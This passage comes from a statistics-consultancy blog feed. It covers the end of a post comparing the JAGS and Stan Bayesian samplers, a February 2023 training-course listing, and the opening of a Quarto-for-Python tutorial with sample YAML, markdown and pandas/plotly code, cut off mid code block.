&lt;p&gt;This section is a little technical. The TL;DR is: JAGS has a toolbox of relatively simple sampling schemes; under special circumstances some of these schemes are very effective. Stan uses a Behemoth of a sampling scheme called Hamiltonian Monte Carlo (HMC). This is a complex sampling scheme but can be very effective for complex models.&lt;/p&gt;
&lt;h4 id="unpacking-the-technical-stuff"&gt;Unpacking the technical stuff&lt;/h4&gt;
&lt;p&gt;JAGS looks at the Bayesian model you have provided and tailors the type of sampling schemes used to maximise performance. When it can be used, JAGS will use a Gibbs sampler. Gibbs is a computationally cheap sampling scheme but can only be used for a small set of likelihood-prior combinations. When JAGS can&amp;rsquo;t use simple, tractable sampling methods it uses more general purpose, but often less efficient methods, such as slice sampling.&lt;/p&gt;
&lt;p&gt;The HMC algorithms within Stan are inspired by statistical physics. By default Stan uses the No U-Turn Sampler (NUTS), a variant on HMC. NUTS utilises Hamiltonian Dynamics, which relies on the gradient of the log posterior, \( \nabla \log \pi (\theta \mid x) \). This clever mathematics will (hopefully!) produce a statistically efficient MCMC scheme. The downside of employing complex mathematics is that each iteration of the MCMC scheme can be computationally complex. For more on HMC see &lt;a href="https://arxiv.org/pdf/1701.02434.pdf" rel="external"&gt;Michael Betancourt&amp;rsquo;s introduction to HMC&lt;/a&gt;. The power of HMC is that it can produce a statistically efficient MCMC scheme; we may not need to run the MCMC scheme for as many iterations to obtain satisfactory results, thus the overall run time may be less.&lt;/p&gt;
&lt;h3 id="one-sampling-scheme-to-rule-them-all"&gt;One sampling scheme to rule them all?&lt;/h3&gt;
&lt;p&gt;Suppose we wanted to fit a model in Stan where one or more of the unknowns is &lt;em&gt;discrete&lt;/em&gt;. This might be because I have some missing count data, for example. In this instance, \( \nabla \log \pi (\theta \mid x) \) will not exist, and therefore HMC, and thus Stan, cannot be used. Algorithms like slice sampling can work in this situation, so JAGS would be an appropriate tool. I also mentioned that JAGS can be fast for simple models. If your Bayesian model exhibits (semi-)conjugacy, JAGS will probably be more efficient as Gibbs sampling can be used.&lt;/p&gt;
&lt;p&gt;If your Bayesian model does not exhibit any conjugacy, Stan will probably be a better option. There are also other scenarios where Stan will probably be better than JAGS. The first is when the model is complex to write down; if your model is complex enough to warrant user-defined functions, I&amp;rsquo;d use Stan.&lt;/p&gt;
&lt;p&gt;Stan also has other functionally that JAGS does not. For example, Stan has an extensive math library. This allows us to solve algebraic equations and differential equations. You can use Stan to solve these types of equations as standalone problems. If we have observed some data about a physical system described by differential equations, you can use Stan&amp;rsquo;s differential equation solvers in a Bayesian framework to conduct uncertainty quantification about the fitted parameters of a differential equation and propagate posterior beliefs into predictions. Pretty cool, right?&lt;/p&gt;
&lt;h3 id="one-sampling-scheme-to-rule-them-all-1"&gt;One sampling scheme to rule them all?&lt;/h3&gt;
&lt;p&gt;I was taught JAGS as an undergraduate student but taught myself Stan as a postgraduate researcher. I think for that reason, it&amp;rsquo;s not entirely fair to compare my learning experiences, but I did find self-teaching Stan to be harder than learning JAGS from a professor. Prior to learning Stan, I had never worked with a statically typed language which definitely took some getting used to. However, I was keen to learn Stan because my complex models were taking a long time to run in JAGS. I found that, after a lot of teething problems (mostly forgetting to end lines with &lt;code&gt;;&lt;/code&gt;), that my Stan implementations of models were much faster than the JAGS equivalent.&lt;/p&gt;
&lt;p&gt;So, which sampling algorithm is best? As with everything in statistics, &lt;em&gt;it depends&lt;/em&gt;. Jorgen Bolstad&amp;rsquo;s &lt;a href="https://www.boelstad.net/post/stan_vs_jags_speed/" rel="external"&gt;blog post&lt;/a&gt; compared the efficiency of JAGS and Stan for a handful of different Bayesian models. The broad summary is, from an &lt;em&gt;efficiency&lt;/em&gt; perspective models with conjugacy are better suited to JAGS, whereas non-conjugate models are better suited to Stan. I think from a programming and user-experience perspective, Stan really wins for &lt;em&gt;complex&lt;/em&gt; models.&lt;/p&gt;
&lt;p&gt;From a programming perspective, after getting over the learning curve, Stan is a better environment for developing Bayesian models. For me, this is because Stan has the flexibility for user-defined functions (which can allow us to specify bespoke distributions as well!).&lt;/p&gt;
&lt;p&gt;I can&amp;rsquo;t tell you what&amp;rsquo;s going to be best for your particular circumstances, but as a general rule I&amp;rsquo;d say for simpler models, JAGS is &lt;em&gt;probably&lt;/em&gt; better and for complex models, Stan is &lt;em&gt;probably&lt;/em&gt; better.&lt;/p&gt;
&lt;p&gt;If you do think Stan is the right tool for you, then why not consider attending &lt;a href="https://www.jumpingrivers.com/training/all-courses/" rel="external"&gt;one of our Stan courses&lt;/a&gt;? Our courses are a great hands-on and interactive way of getting up-and-running and fitting models with Stan!&lt;/p&gt;
&lt;script src="https://www.jumpingrivers.com/third-party/stan.js"&gt;&lt;/script&gt; &lt;!-- Stan syntax --&gt;
&lt;script&gt;
document.querySelectorAll('pre code.language-stan').forEach(block =&gt; hljs.highlightBlock(block));
&lt;/script&gt;
&lt;style&gt;
pre {
color:#f8f8f2 !important;
background-color:#272822 !important;
-moz-tab-size:4 !important;
-o-tab-size:4 !important;
tab-size:4 !important;
}
&lt;/style&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/why-stan/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>February Training Update</title><link>https://www.jumpingrivers.com/blog/february-training-update/</link><pubDate>Tue, 07 Feb 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/february-training-update/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/february-training-update/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/february-training-update/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;We have a great selection of online public training courses coming up over the next two months, including a variety of R courses, as well as some more stats-heavy courses on Bayesian Inference! Read on for a taste of what&amp;rsquo;s in store, or head over to our &lt;a href="https://www.jumpingrivers.com/training/public/" rel="external"&gt;training page&lt;/a&gt; for full details and to book!&lt;/p&gt;
&lt;h3 id="bayesian-inference"&gt;Bayesian Inference&lt;/h3&gt;
&lt;p&gt;Our upcoming courses on Bayesian inference take you from an introduction through to implementing models using Stan with R.&lt;/p&gt;
&lt;h4 id="introduction-to-bayesian-inferencehttpswwwjumpingriverscomtrainingcourseintroduction-bayesian-inference-rstan-monte-carlo"&gt;(Introduction to Bayesian Inference)[https://www.jumpingrivers.com/training/course/introduction-bayesian-inference-rstan-monte-carlo/]&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Foundation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 20th February 2023&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The capturing and quantification of uncertainty is a very important aspect of model-fitting and parameter inference. Bayesian inference represents a fully-probabilistic approach to parameter inference, allowing a practitioner to quantify their uncertainties through probability densities. However, fitting models in a Bayesian framework can be an involved and complicated affair, often necessitating the use of Markov chain Monte Carlo (MCMC) algorithms and their programmatic implementation.&lt;/p&gt;
&lt;h4 id="introduction-to-bayesian-inference-using-rstan"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/introduction-bayesian-inference-rstan-monte-carlo/" rel="external"&gt;Introduction to Bayesian Inference using RStan&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 20th-23rd February 2023&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Despite the promise of big data, inferences are often limited by its systematic structure. Only by carefully modelling this structure can we take full advantage of the data. Stan is a platform for facilitating this modelling, providing an expressive modelling language to implement state-of-the-art algorithms, to draw subsequent Bayesian inferences.&lt;/p&gt;
&lt;p&gt;The course will teach participants how to interface with Stan through R!&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-february-training-update"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;!-- This is where the ad goes! Just use the name of the shortcode file. --&gt;&lt;/p&gt;
&lt;h3 id="r"&gt;R&lt;/h3&gt;
&lt;p&gt;If you already have the basics of R down, and want to get a bit more adventurous with it, take a look at some of our more advanced R courses for plotting and data wrangling. We also offer a course on R best practices, so you can make sure your code stands up to the tests of time.&lt;/p&gt;
&lt;h4 id="data-visualisation-with-ggplot2"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-advanced-graphics-ggplot2-plotly-themes-scaling-faceting/" rel="external"&gt;Data visualisation with ggplot2&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 6th-7th March 2023&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Want to learn how to effectively visualise your data in R using the elegant {ggplot2} package? With {ggplot2} it’s easy to customise everything from plot layouts and themes to scales, colours, and more! This course will comprehensively take you through basic plot types such as bar and line charts as well as cover more advanced topics such as interactive graphics with {plotly}.&lt;/p&gt;
&lt;h4 id="r-best-practices"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-best-practices/" rel="external"&gt;R Best Practices&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 20th-21st March 2023&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;So you can write code? Great. But can you write code which is easy to read, simple to maintain, and reproducible? Under the pressure of deadlines even the best of us can fall victim to bad-practices. In this course we motivate the importance of good-practices, and show how we can make best practices second nature by incorporating them into our normal workflow.&lt;/p&gt;
&lt;h4 id="data-wrangling-in-the-tidyverse"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/data-tidyverse-dplyr-tidyr-lubridate-forcats/" rel="external"&gt;Data Wrangling in the Tidyverse&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Foundation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 27th-28th March 2023&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;If you work with data, you probably spend a lot of time cleaning it and wrangling it into the correct shape. This course will show you how you can use R to efficiently clean and wrangle your data into a format that’s ready for analysis. You will learn about the Tidyverse, what tidy data really is, and how to practically achieve it with packages such as {dplyr}, {tidyr}, {lubridate} and {forcats}.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/february-training-update/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Quarto for the Python user</title><link>https://www.jumpingrivers.com/blog/quarto-for-python-users/</link><pubDate>Thu, 02 Feb 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/quarto-for-python-users/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/quarto-for-python-users/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/quarto-for-python-users/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;As data scientists we often need to communicate conclusions drawn from data. Additionally, as more data is collected,
our reports invariably need updating. This is where automated reporting tools such as Quarto come in! In this blog post we will look at how
Quarto allows us to weave together text and Python code to generate reproducible reports.&lt;/p&gt;
&lt;h3 id="what-is-quarto"&gt;What is Quarto?&lt;/h3&gt;
&lt;p&gt;Quarto is a technical publishing system built on Pandoc. By combining code with plain text, it allows you to create reports that can easily be updated
when the data changes. For example, imagine you have to report on the profits of a company each month. With Quarto, you can create your report with any key figures and charts, then with just the click of a button update it each month with new data. You can also create content in a variety of formats, from articles and scientific papers to websites and presentations, in HTML, PDF, MS Word and more.&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-quarto-for-python-users"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;!-- This is where the ad goes! Just use the name of the shortcode file. --&gt;&lt;/p&gt;
&lt;h3 id="how-does-it-work"&gt;How does it work?&lt;/h3&gt;
&lt;p&gt;&lt;img alt="A flow chart of the Quarto rendering workflow: The qmd file is first converted to Markdown, with Jupyter used to interpret the code cells. The Markdown file can then be converted to a variety of formats, including html, docx and pdf, using Pandoc." height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/quarto-for-python-users/quarto-diagram.png" width="838"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;.qmd&lt;/strong&gt;: For Quarto we work in a &lt;code&gt;.qmd&lt;/code&gt; file. This will contain a mix of markdown and code chunks.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Jupyter&lt;/strong&gt;: When the file is rendered with Quarto, the code chunks are interpreted by Jupyter. You can also select
which Jupyter kernel you want to use.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;.md&lt;/strong&gt;: The code and output, as well as the rest of the content, is then converted to plain markdown.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Pandoc&lt;/strong&gt;: The markdown file is converted to a variety of other formats using &lt;a href="https://pandoc.org/" rel="external"&gt;Pandoc&lt;/a&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;.html/.pdf/.docx&lt;/strong&gt;: A &lt;code&gt;.qmd&lt;/code&gt; file can be rendered in multiple different formats without having to change any content.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="where-do-i-run-quarto"&gt;Where do I run Quarto?&lt;/h3&gt;
&lt;p&gt;There are a couple of IDEs where you can run Quarto with Python. For this post
we will be focusing on the Quarto extension for VS Code, which offers an
extensive variety of tools for editing your documents. As we will show in an
upcoming post, you can also render Quarto documents directly from Jupyter
notebooks.&lt;/p&gt;
&lt;p&gt;First things first you will need to &lt;a href="https://quarto.org/docs/get-started/" rel="external"&gt;install Quarto&lt;/a&gt;. From VS Code, you can then find the extension by clicking on &amp;ldquo;Settings&amp;rdquo;, then
&amp;ldquo;Extensions&amp;rdquo;, then typing &amp;ldquo;quarto&amp;rdquo; into the search bar. Select the &amp;ldquo;Quarto&amp;rdquo;
extension, click &amp;ldquo;Install&amp;rdquo; and after a few seconds you&amp;rsquo;ll be good to go!&lt;/p&gt;
&lt;p&gt;A Quarto document is essentially a text file with a .qmd extension. This can be
created in VS Code by clicking on &amp;ldquo;File&amp;rdquo;, then &amp;ldquo;New File&amp;hellip;&amp;rdquo;, then &amp;ldquo;Quarto
Document (qmd)&amp;rdquo;. Clicking the &amp;ldquo;Render&amp;rdquo; button (or using the keyboard shortcut Ctrl+Shift+K) will open a side window with a
live preview that will update as you edit the document:&lt;/p&gt;
&lt;p&gt;&lt;img alt="A screenshot of VS Code: The qmd file contents are displayed on the left, and the rendered document preview is displayed in a side window on the right." height="auto" id="h-rh-i-1" src="https://www.jumpingrivers.com/blog/quarto-for-python-users/vscode_screenshot.png" width="1848"&gt;&lt;/p&gt;
&lt;p&gt;You can also run Quarto via the terminal:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;To preview your document as you edit it:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;quarto preview &amp;lt;your-doc&amp;gt;.qmd
&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
&lt;li&gt;To convert the document from .qmd into the desired output format:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;quarto render &amp;lt;your-doc&amp;gt;.qmd
&lt;/code&gt;&lt;/pre&gt;&lt;h3 id="preparing-a-document"&gt;Preparing a document&lt;/h3&gt;
&lt;p&gt;Let&amp;rsquo;s use Quarto to write an html &lt;a href="https://jumpingrivers.github.io/blog/quarto_python_penguins_report.html" rel="external"&gt;web report&lt;/a&gt; about penguins! 🐧&lt;/p&gt;
&lt;p&gt;If you wish to run the code yourself you will need the following dependencies:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://pandas.pydata.org/getting_started.html" rel="external"&gt;pandas&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://plotly.com/python/getting-started/" rel="external"&gt;plotly&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.statsmodels.org/dev/install.html" rel="external"&gt;statsmodels&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These can be installed with:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;python3 -m pip install pandas plotly statsmodels
&lt;/code&gt;&lt;/pre&gt;&lt;h4 id="1-yaml-header"&gt;1) YAML header&lt;/h4&gt;
&lt;p&gt;To start, we&amp;rsquo;ll need a YAML header.&lt;/p&gt;
&lt;p&gt;YAML is a human readable language often used to write configuration files. In
Quarto, it&amp;rsquo;s used to configure the settings for the presentation and formatting
of the documents.&lt;/p&gt;
&lt;p&gt;The header is fenced above and below by three hyphens (&lt;code&gt;---&lt;/code&gt;). The example below
includes some common settings:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;---&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#7ee787"&gt;title&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Reporting on the bill length of penguins&amp;#34;&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#7ee787"&gt;author&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Myles Mitchell &amp;amp; Parisa Gregg&amp;#34;&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#7ee787"&gt;date&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;14 December 2022&amp;#34;&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#7ee787"&gt;format&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;html&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#7ee787"&gt;jupyter&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;python3&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;---&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;The first three should be self-explanatory!&lt;/li&gt;
&lt;li&gt;&lt;code&gt;format&lt;/code&gt; sets the preferred output format for your document (html, pdf, docx,
&amp;hellip;)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;jupyter&lt;/code&gt; sets the kernel for executing embedded Python code&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;You don&amp;rsquo;t have to specify a Jupyter kernel if the first code chunk is in Python;
in that case, Quarto will know to use Jupyter (although you may still wish to
select a specific kernel).&lt;/p&gt;
&lt;h4 id="2-markdown-text"&gt;2) Markdown text&lt;/h4&gt;
&lt;p&gt;The main body of text is written in markdown syntax. If you haven&amp;rsquo;t used
markdown before, it&amp;rsquo;s an easy-to-learn language that allows you to combine plain
text and blocks of code.&lt;/p&gt;
&lt;p&gt;We&amp;rsquo;ll say a bit more about Python code chunks below, but for a quick guide to
markdown basics, the
&lt;a href="https://quarto.org/docs/authoring/markdown-basics.html" rel="external"&gt;Quarto documentation&lt;/a&gt;
is a great place to start!&lt;/p&gt;
&lt;p&gt;Here&amp;rsquo;s an opening passage for our report, written in markdown:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-md" data-lang="md"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;## Abstract
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Prepare yourself for a life-changing article about penguins...
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;## Introduction
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#7ee787"&gt;Penguins&lt;/span&gt;](https://en.wikipedia.org/wiki/Penguin) are a family
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;(**Spheniscidae**) of aquatic flightless
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#7ee787"&gt;birds&lt;/span&gt;](https://en.wikipedia.org/wiki/Bird) that live primarily in the
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#7ee787"&gt;Southern Hemisphere&lt;/span&gt;](https://en.wikipedia.org/wiki/Southern_Hemisphere).
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Their diet consists of:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;-&lt;/span&gt; Krill
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;-&lt;/span&gt; Fish
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;-&lt;/span&gt; Squid
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;-&lt;/span&gt; More fish
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;There are 18 species of penguin, including:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;1.&lt;/span&gt; Macaroni penguin (*Eudyptes chrysolophus*)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;2.&lt;/span&gt; Chinstrap penguin (*Pygoscelis antarcticus*)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;3.&lt;/span&gt; Gentoo penguin (*Pygoscelis papua*)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We&amp;rsquo;ve included hyperlinks, bullet points, numbered lists, bold and italic font
using the asterisk symbol, and subheadings using the hash symbol.&lt;/p&gt;
&lt;p&gt;The screenshot below shows the rendered output so far:&lt;/p&gt;
&lt;p&gt;&lt;img alt="A screenshot of the title, abstract and introduction in our rendered html output." height="auto" id="h-rh-i-2" src="https://www.jumpingrivers.com/blog/quarto-for-python-users/intro_screenshot.png" width="1254"&gt;&lt;/p&gt;
&lt;h4 id="3-code-chunks"&gt;3) Code chunks&lt;/h4&gt;
&lt;p&gt;We can use code chunks to insert code into the document. These are fenced off
by three backticks (```). To specify the language we can include &lt;code&gt;{python}&lt;/code&gt;
after the first set of backticks.&lt;/p&gt;
&lt;p&gt;The Python code is not just for show! It can also be used to dynamically
generate content including figures and tables. Let&amp;rsquo;s use some Python code to
include a plot in our document. We&amp;rsquo;ll start by loading in some data using
pandas:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-md" data-lang="md"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;``&lt;span style="color:#a5d6ff"&gt;`{python}
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;import pandas as pd
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;data = pd.read_csv(
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; &amp;#39;https://raw.githubusercontent.com/rfordatascience/tidytuesday/master/data/2020/2020-07-28/penguins.csv&amp;#39;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;data.head()
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;`&lt;/span&gt;``
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The first five rows of the &lt;code&gt;DataFrame&lt;/code&gt; will be displayed by &lt;code&gt;data.head()&lt;/code&gt; in
the rendered document, along with the code used to load in the data:&lt;/p&gt;
&lt;p&gt;&lt;img alt="A screenshot of the table in our rendered html output, along with the code used to generate it." height="auto" id="h-rh-i-3" src="https://www.jumpingrivers.com/blog/quarto-for-python-users/table_screenshot.png" width="1209"&gt;&lt;/p&gt;
&lt;p&gt;Now let&amp;rsquo;s make a plot. Because we&amp;rsquo;re creating a web document, let&amp;rsquo;s generate an
interactive figure using the plotly library:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-md" data-lang="md"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;``&lt;span style="color:#a5d6ff"&gt;`{python}
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;#| echo: false
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;#| fig-cap: &amp;#34;Bill length as a function of body mass&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;#| fig-width: 8
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;import plotly.express as px
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;
